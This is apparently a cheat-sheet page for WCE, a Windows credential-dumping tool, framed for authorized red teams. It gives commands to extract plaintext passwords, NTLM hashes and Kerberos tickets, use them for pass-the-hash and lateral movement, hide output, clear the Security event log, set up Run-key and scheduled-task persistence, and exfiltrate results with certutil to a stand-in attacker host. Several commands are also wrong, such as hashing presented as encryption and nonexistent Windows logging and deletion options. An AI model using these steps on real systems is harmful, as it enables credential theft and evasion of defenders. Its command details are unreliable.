WCE (Windows Credentials Editor)
Overview
Sección titulada «Overview»WCE (Windows Credentials Editor) is a specialized tool for extracting and manipulating Windows credentials from memory. It allows authorized security professionals to view plaintext passwords, NTLM hashes, and Kerberos tickets from running processes. WCE is used in authorized penetration testing, red team exercises, and security research on Windows systems.
Prerequisites
Sección titulada «Prerequisites»- Windows system with administrator privileges
- Understanding of Windows credential storage mechanisms
- Authorization to perform credential testing
Installation
Sección titulada «Installation»Direct Download
Sección titulada «Direct Download»Download the precompiled binary from the official release site:
# Download wce.exe
# SHA256: Verify checksum before execution
certutil -hashfile wce.exe SHA256Compilation (Optional)
Sección titulada «Compilation (Optional)»# For advanced users compiling from source
# Requires Windows development environment
# gcc or MSVC toolchain
gcc -o wce.exe wce.cFile Structure
Sección titulada «File Structure»wce/
├── wce.exe # Main executable (32-bit)
├── wce-universal.exe # Universal binary
├── README.txt
└── CHANGELOGBasic Commands
Sección titulada «Basic Commands»| Command | Description |
|---|---|
wce -l | List all credentials in memory |
wce -c | Display running processes with credentials |
wce -g | Get credentials from specific process |
wce -s | Start process and extract credentials |
wce -k | Extract Kerberos tickets |
wce -n | Extract NTLM hashes |
wce -w | Write credentials to file |
wce -h | Display help information |
Credential Extraction
Sección titulada «Credential Extraction»List All Credentials
Sección titulada «List All Credentials»# Extract all credentials from memory
wce -l
# Output example:
# User: DOMAIN\Administrator
# Password: P@ssw0rd123
# Hash: 8846f7eaee8fb117ad06bdd830b7586cExtract from Specific Process
Sección titulada «Extract from Specific Process»# Get credentials from a specific PID
wce -l -s ProcessName
# Get credentials from explorer.exe
wce -l -s explorer.exe
# Get credentials from svchost.exe
wce -l -s svchost.exeVerbose Output
Sección titulada «Verbose Output»# Detailed credential information
wce -l -v
# Shows:
# - Username
# - Domain
# - Plaintext password
# - NTLM hash
# - Process ID
# - Credential typeNTLM Hash Extraction
Sección titulada «NTLM Hash Extraction»Extract NTLM Hashes
Sección titulada «Extract NTLM Hashes»# Get all NTLM hashes from memory
wce -l -n
# Output format:
# username:domain:lmhash:ntmhash
# Administrator:WORKGROUP:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cSave Hashes to File
Sección titulada «Save Hashes to File»# Export hashes for crack attempt
wce -l -n > hashes.txt
# Format for hashcat/john:
# username:uid:lmhash:ntmhash:::Identify Hash Types
Sección titulada «Identify Hash Types»# Determine which hashes are present
wce -l -n | findstr /v "aad3b435b51404eeaad3b435b51404ee"
# aad3b435b51404eeaad3b435b51404ee is empty LM hash indicatorKerberos Ticket Extraction
Sección titulada «Kerberos Ticket Extraction»Extract Kerberos Tickets
Sección titulada «Extract Kerberos Tickets»# List all Kerberos tickets in memory
wce -l -k
# Output shows:
# - Service ticket granting ticket (TGT)
# - Service tickets (ST)
# - Session keysExport Tickets for Pass-the-Ticket
Sección titulada «Export Tickets for Pass-the-Ticket»# Extract ticket in base64 format
wce -l -k -b > tickets.txt
# Import and use with ptk tools
# or Mimikatz pass-the-ticket functionalityProcess Monitoring
Sección titulada «Process Monitoring»Monitor Running Processes
Sección titulada «Monitor Running Processes»# List processes with cached credentials
wce -c
# Shows active processes with credential handles
# Useful for targeting services and system processesDump Credentials from Service Account
Sección titulada «Dump Credentials from Service Account»# Target specific service
wce -l -s "SQL Server (MSSQLSERVER)"
# Target IIS application pool
wce -l -s "w3wp.exe"
# Target backup service
wce -l -s "mbsvc.exe"Advanced Usage
Sección titulada «Advanced Usage»Silent Extraction Mode
Sección titulada «Silent Extraction Mode»# Extract without user feedback
wce -l -s ProcessName -w output.txt
# Redirect all output to file
# Useful for automated red team operationsFilter Credentials by Domain
Sección titulada «Filter Credentials by Domain»# Extract only domain credentials
wce -l | findstr "DOMAIN\"
# Extract local machine credentials
wce -l | findstr /v "DOMAIN"Continuous Monitoring
Sección titulada «Continuous Monitoring»# Monitor for new credentials over time
wce -l > credentials_snapshot.txt
# Wait and capture changes
timeout /t 300
wce -l > credentials_update.txt
# Compare snapshots
fc credentials_snapshot.txt credentials_update.txtIntegration with Other Tools
Sección titulada «Integration with Other Tools»Pass-the-Hash with WCE
Sección titulada «Pass-the-Hash with WCE»# Extract NTLM hash
wce -l -n > hashes.txt
# Use with PsExec pass-the-hash:
# psexec.exe -h \\targethost -u DOMAIN\user -p :ntmhash cmd.exeCredential Dumping Pipeline
Sección titulada «Credential Dumping Pipeline»# Extract and prepare for cracking
wce -l -n | sed 's/:.*$//' > usernames.txt
wce -l -n | sed 's/.*://' > hashes.txt
# Match for rainbow table lookup
# or GPU cracking with hashcatIntegration with Mimikatz
Sección titulada «Integration with Mimikatz»# WCE focuses on memory extraction
# Mimikatz handles encryption/logonsessions
# Complement with Mimikatz:
# mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
# Compare results for complete credential auditSecure Credential Handling
Sección titulada «Secure Credential Handling»Encrypt Exported Credentials
Sección titulada «Encrypt Exported Credentials»# Export and encrypt immediately
wce -l > creds.txt
# Encrypt output
certutil -hashfile creds.txt SHA256
# Delete original
del /secure creds.txtLog Credential Access
Sección titulada «Log Credential Access»# Create audit trail
echo [%date% %time%] WCE executed by %username% >> audit.log
wce -l >> audit.log
# Encrypt audit log
cipher /e /s:%cd% audit.logDetection and Evasion
Sección titulada «Detection and Evasion»Stealth Extraction
Sección titulada «Stealth Extraction»# Run from temporary location
cd %temp%
wce.exe -l > output.txt
# Use alternate data streams (Windows)
wce.exe -l > output.txt:hidden
# Clean temporary artifacts
del output.txtTiming Considerations
Sección titulada «Timing Considerations»# Extract during user logon/logoff
# When credentials are most likely in memory
# Target peak hours for service credentials
# Avoid antivirus scan windowsTroubleshooting
Sección titulada «Troubleshooting»No Credentials Found
Sección titulada «No Credentials Found»# Issue: No credentials displayed
# Solution 1: Verify admin privileges
whoami /priv | findstr SeDebugPrivilege
# Solution 2: Check for 64-bit vs 32-bit mismatch
wce.exe -l # 32-bit
# Try 64-bit version for x64 systemsAccess Denied Error
Sección titulada «Access Denied Error»# Issue: "Access Denied" when running WCE
# Solution: Run as Administrator
# Method 1: Right-click Run as Administrator
# Method 2: From admin command prompt
wce.exe -l
# Method 3: Schedule as SYSTEM
schtasks /create /tn "CredDump" /tr "wce.exe -l" /sc once /st 12:00Missing Credentials
Sección titulada «Missing Credentials»# Issue: Expected credentials not shown
# Possible causes:
# 1. Credentials cleared from memory
# 2. User not logged in
# 3. Process permissions restrict access
# Solution: Check active sessions
wce -c
# Wait for user to interact with system
# Credentials cached when passwords enteredOperational Security
Sección titulada «Operational Security»OPSEC Best Practices
Sección titulada «OPSEC Best Practices»# 1. Use temporary filenames
set /p filename=<nul
wce.exe -l > %random%.txt
# 2. Compress and encrypt output
wce.exe -l | gzip > creds.gz
# Transfer via encrypted channel
# 3. Delete WCE and artifacts
del wce.exe
del %random%.txtDetection Mitigation
Sección titulada «Detection Mitigation»# 1. Disable Windows Update notifications
# 2. Clear event logs
wevtutil cl Security
# 3. Remove command history
history -c
# 4. Close all logging
# Disable PowerShell logging
powershell -NoProfile -Command "Disable-PSLogging"Practical Examples
Sección titulada «Practical Examples»Red Team Credential Harvesting
Sección titulada «Red Team Credential Harvesting»# Establish persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Cred" /d "C:\Windows\Temp\wce.exe -l > C:\Windows\Temp\log.txt"
# Create scheduled task for periodic dumps
schtasks /create /tn "System Maintenance" /tr "C:\Windows\Temp\wce.exe -l >> C:\Windows\Temp\log.txt" /sc hourly
# Exfiltrate credentials
certutil -urlcache -f "http://attacker.com/upload.php?data=" log.txtPrivilege Escalation Chain
Sección titulada «Privilege Escalation Chain»# 1. Get current user credentials
wce -l -s explorer.exe
# 2. Extract service account credentials
wce -l -s svchost.exe
# 3. Use extracted credentials for lateral movement
# psexec -u DOMAIN\serviceaccount -p password \\target cmd.exeCredential Audit
Sección titulada «Credential Audit»# Comprehensive audit script
@echo off
echo [*] WCE Credential Audit - %date% %time%
wce -l -v >> audit_report.txt
echo.
echo [*] NTLM Hashes:
wce -l -n >> audit_report.txt
echo.
echo [*] Kerberos Tickets:
wce -l -k >> audit_report.txt
echo Audit complete - results in audit_report.txtComparison with Similar Tools
Sección titulada «Comparison with Similar Tools»| Tool | Purpose | Focus |
|---|---|---|
| WCE | Plaintext password extraction | Windows credentials in memory |
| Mimikatz | Complete Windows security analysis | Encryption, logon sessions |
| ProcDump | Memory dump utility | Generic process memory |
| PowerSploit | PowerShell exploitation framework | Full Windows exploitation |
| Responder | LLMNR/NBNS poisoning | Network credential capture |
Limitations
Sección titulada «Limitations»- Requires admin privileges
- Plaintext passwords limited to cached/active sessions
- Works primarily on Windows systems
- Modern credential guard may limit effectiveness
- Service account passwords vary by running context
Related Tools
Sección titulada «Related Tools»- Mimikatz: More comprehensive Windows exploitation
- Responder: Network-based credential capture
- LaZagne: Cross-platform credential recovery
- CrackMapExec: Lateral movement and credential testing
References
Sección titulada «References»- Windows Credentials Editor Repository
- NTLM Hash Specification Microsoft Docs
- Kerberos Authentication RFC 4120
- Credential Guard Microsoft Security Blog
Legal Notice
Sección titulada «Legal Notice»WCE is designed for authorized security testing, red team exercises, and defensive research. Unauthorized access to computer systems is illegal. Only use on systems you own or have explicit written permission to test.